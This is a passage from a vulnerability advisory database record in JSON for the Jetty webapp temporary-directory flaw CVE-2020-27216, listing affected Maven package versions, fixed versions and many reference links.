"events": [ { "introduced": "0" }, { "fixed": "9.4.33.v20201020" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.mortbay.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.33" } ] } ], "versions": [ "7.0.0.pre4", "7.0.0.pre5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0.beta1" }, { "fixed": "10.0.0.beta3" } ] } ], "versions": [ "10.0.0.beta1", "10.0.0.beta2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.mortbay.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0.beta1" }, { "fixed": "10.0.0.beta3" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0.beta1" }, { "fixed": "11.0.0.beta3" } ] } ], "versions": [ "11.0.0.beta1", "11.0.0.beta2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.mortbay.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0.beta1" }, { "fixed": "11.0.0.beta3" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6#advisory-comment-63053" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27216" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/5451" }, { "type": "WEB", "url": "https://github.com/github/codeql/pull/4473" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa9c370ab42d737e93bc1795bb6a2187d7c60210cd5e3b3ce8f3c484@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad255c736fad46135f1339408cb0147d0671e45c376c3be85ceeec1a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae15d73cabef55bad148e4e6449b05da95646a2a8db3fc938e858dff@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raf9c581b793c30ff8f55f2415c7bd337eb69775aae607bf9ed1b16fb@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rafb023a7c61180a1027819678eb2068b0b60cd5c2559cb8490e26c81@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb077d35f2940191daeefca0d6449cddb2e9d06bcf8f5af4da2df3ca2@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5f2558ea2ac63633dfb04db1e8a6ea6bb1a2b8614899095e16c6233@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb69b1d7008a4b3de5ce5867e41a455693907026bc70ead06867aa323@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7e159636b26156f6ef2b2a1a79b3ec9a026923b5456713e68f7c18e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb81a018f83fe02c95a2138a7bb4f1e1677bd7e1fc1e7024280c2292d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8ad3745cb94c60d44cc369aff436eaf03dbc93112cefc86a2ed53ba@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c007f87dc57731a7b9a3b05364530422535b7e0bc6a0c5b68d4d55@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a622401924fadab61e07393235838918228b3d8a1a6704295b032@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf99e4495461099cad9aa62e0164f8f25a7f97b791b4ace56e375f8d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1646894341450fdc4f7e96a88f5e2cf18d8004714f98aec6b831b3e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1d9b8e9d17749d4d2b9abaaa72c422d090315bd6bc0ae73a16abc1c@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re08b03cd1754b32f342664eead415af48092c630c8e3e0deba862a26@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d45051310b11c6d6476f20d71b08ea97cb76846cbf61d196bac1c3f@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8cacf91ae1b17cc6531d20953c52fa52f6fd3191deb3383446086ab7@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8dd01541fc49d24ec223365a9974231cbd7378b749247a89b0a52210@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8fead0144bb84d8714695c43607dca9c5101aa028a431ec695882fe5@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90b5ac6e2bf190a5297bda58c7ec76d01cd86ff050b2470fcd9f4b35@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r911c1879258ebf98bca172c0673350eb7ea6569ca1735888d4cb7adc@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r916b6542bd5b15a8a7ff8fc14a0e0331e8e3e9d682f22768ae71d775@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r93b240be16e642579ed794325bae31b040e1af896ecc12466642e19d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r93d5e81e879120d8d87925dbdd4045cb3afa9b066f4370f60b626ce3@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b790fe3a93121199f41258474222f15002b2f729495aa7ecbf90718@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c010b79140452294292379183e7fe8e3533c5bb4db3f3fb39a6df61@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9cc76b98f87738791b8ec3736755f92444d3c8cb26bd4e4ffdb5c1cc@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9cd444f944241dc26d9b8b007fe8971ed7f005b56befef7a4f4fb827@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d9b4b93df7f92cdf1147db0fc169be1776c93d1fbc63bc65721fffd@%3Cdev.knox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f8c45a2a4540911cd8bd0485f67e8091883c9234d7a3aeb349c46c1@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1f19625cc67ac1b459c558f2ea5647d71ce51c6fe4f4cb03baec849@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra55e04d5a73afcb8383f4386e2b26832c6e3972e53827021ab885943@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra5b7313d8cc9411db6790adfba33f2cf0665cb77adb7b02043c95867@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5706141ca397587f7ee0f500a39ccc590a41f802fc125fc135cb92f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree506849c4f04376793b1a3076bc017da60b8a2ef2702dc214ff826f@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/refbbb0eb65c185d1fa491cee08ac8ed32708ce3b269133a6da264317@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf00ea6376f3d0e8b8f62cf6d4a4f28b24e27193acd2c851f618aa41e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf3bc023a7cc729aeac72f482e2eeeab9008aa6b1dadbeb3f45320cae@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd9f102864a039f7fda64a580dfe1a342d65d7b723ca06dc9fbceb31@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe5caef1fd6cf4b8ceac1b63c33195f2908517b665c946c020d3fbd6@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe6ba83d14545e982400dea89e68b10113cb5202a3dcb558ce64842d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff0ad6a7dac2182421e2db2407e44fbb61a89904adfd91538f21fbf8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201123-0005" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2e24756d28580eeac811c5c6a12012c9f424b6e5bffb89f98ee3d03@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc44d1147f78496ec9932a38b28795ff4fd0c4fa6e3b6f5cc33c14d29@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4b972ea10c5a65c6a88a6e233778718ab9af7f484affdd5e5de0cff@%3Ccommits.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc77918636d8744d50312e4f67ba2e01f47db3ec5144540df8745cb38@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8dd95802be0cca8d7d0929c0c8484ede384ecb966b2a9dc7197b089@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc9d2ab8a6c7835182f20b01104798e67c75db655c869733a0713a590@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rccedec4cfd5df6761255b71349e3b7c27ee0745bd33698a71b1775cf@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdcf32952397c83a1d617a8c9cd5c15c98b8d0d38a607972956bde7e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdd56ab4255801a0964dcce3285e87f2c6994e6469e189f6836f34e3@%3Cnotifications.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcfb95a7c69c4b9c082ea1918e812dfc45aa0d1e120fd47f68251a336@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcff5caebfd535195276aaabc1b631fd55a4ff6b14e2bdfe33f18ff91@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd58b60ab2e49ebf21022e59e280feb25899ff785c88f31fe314aa5b9@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7e62e2972a41c2658f41a824b8bdd15644d80fcadc51fe7b7c855de@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbf1cd0ab330c032f3a09b453cb6405dccc905ad53765323bddab957@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdddb4b06e86fd58a1beda132f22192af2f9b56aae8849cb3767ccd55@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde782fd8e133f7e04e50c8aaa4774df524367764eb5b85bf60d96747@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dbb87c9255ecefadd8de514fa1d35c1d493c0527d7672cf40505d04@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1ed79516bd6d248ea9f0e704dbfd7de740d5a75b71c7be8699fec824@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1ef28b89ff0281c87ba3a7659058789bf28a99b8074191f1c3678db8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fe31643fc34b4a33ae3d416d92c271aa97663f1782767d25e1d9ff8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2122537d3f9beb0ce59f44371a951b226406719919656ed000984bd0@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r279254a1bd6434c943da52000476f307e62b6910755387aeca1ec9a1@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2aa316d008dab9ae48350b330d15dc1b863ea2a933558fbfc42b91a6@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d17b2a4803096ba427f3575599ea29b55f5cf9dbc1f12ba044cae1a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e02700f7cfecb213de50be83e066086bea90278cd753db7fdc2ccff@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f732ee49d00610683ab5ddb4692ab25136b00bfd132ca3a590218a9@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3042a9dd2973aa229e52d022df7813e4d74b67df73bfa6d97bb0caf8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r336b1694a01858111e4625fb9ab2b07ad43a64a525cf6402e06aa6bf@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r351298dd39fc1ab63303be94b0c0d08acd72b17448e0346d7386189b@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r382870d6ccfd60533eb0d980688261723ed8a0704dafa691c4e9aa68@%3Ccommits.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a763de620be72b6d74f46ec4bf39c9f35f8a0b39993212c0ac778ec@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3b0ce1549a1ccdd7e51ec66daf8d54d46f1571edbda88ed09c96d7da@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=567921" }, { "type": "WEB", "url": "https://cwe.mitre.org/data/definitions/378.html" }, { "type": "WEB", "url": "https://cwe.mitre.org/data/definitions/379.html" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0259b14ae69b87821e27fed1f5333ea86018294fd31aab16b1fac84e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07525dc424ed69b3919618599e762f9ac03791490ca9d724f2241442@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r09b345099b4f88d2bed7f195a96145849243fb4e53661aa3bcf4c176@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d7ad4f02c44d5d53a9ffcbca7ff4a8138241322da9c5c35b5429630@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d95e01f52667f44835c40f6dea72bb4397f33cd70a564ea74f3836d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0df8fe10fc36028cf6d0381ab66510917d0d68bc5ef7042001d03830@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0e9efe032cc65433251ee6470c66c334d4e7db9101e24cf91a3961f2@%3Ccommits.directory.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f5e9b93133ef3aaf31484bc3e15cc4b85f8af0fe4de2dacd9379d72@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r100c5c7586a23a19fdb54d8a32e17cd0944bdaa46277b35c397056f6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r171846414347ec5fed38241a9f8a009bd2c89d902154c6102b1fb39a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r185d10aae8161c08726f3ba9a1f1c47dfb97624ea6212fa217173204@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18b6f10d9939419bae9c225d5058c97533cb376c9d6d0a0733ddd48d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r19e8b338af511641d211ff45c43646fe1ae19dc9897d69939c09cabe@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d40368a309f9d835dcdd900249966e4fcbdf98c1cc4c84db2cd9964@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b83ca85c8f9a6794b1f85bc70d1385ed7bc1ad07750d0977537154a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dfa64ecc3d67c1a71c08bfa04064549179d499f8e20a8285c57bd51@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6f51a654ac2e67e3d1c65a8957cbbb127c3f15b64b4fcd626df03633@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70f8bcccd304bd66c1aca657dbfc2bf11f73add9032571b01f1f733d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r71da5f51ef04cb95abae560425dce9667740cbd567920f516f76efb7@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r73b5a9b677b707bbb7c1469ea746312c47838b312603bada9e382bba@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r761a52f1e214efec286ee80045d0012e955eebaa72395ad62cccbcfc@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769411eb43dd9ef77665700deb7fc491fc3ceb532914260c90b56f2f@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r77dd041d8025a869156481d2268c67ad17121f64e31f9b4a1a220145@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bdc83513c12db1827b79b8d57a7a0975a25d28bc6c5efe590ec1e02@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7da5ae60d7973e8894cfe92f49ecb5b47417eefab4c77cc87514d3cf@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8045eedd6bb74efcd8e01130796adbab98ee4a0d1273509fb1f2077a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819857361f5a156e90d6d06ccf6c41026bc99030d60d0804be3a9957@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r827d17bf6900eddc686f4b6ee16fc5e52ca0070f8df7612222c40ac5@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": 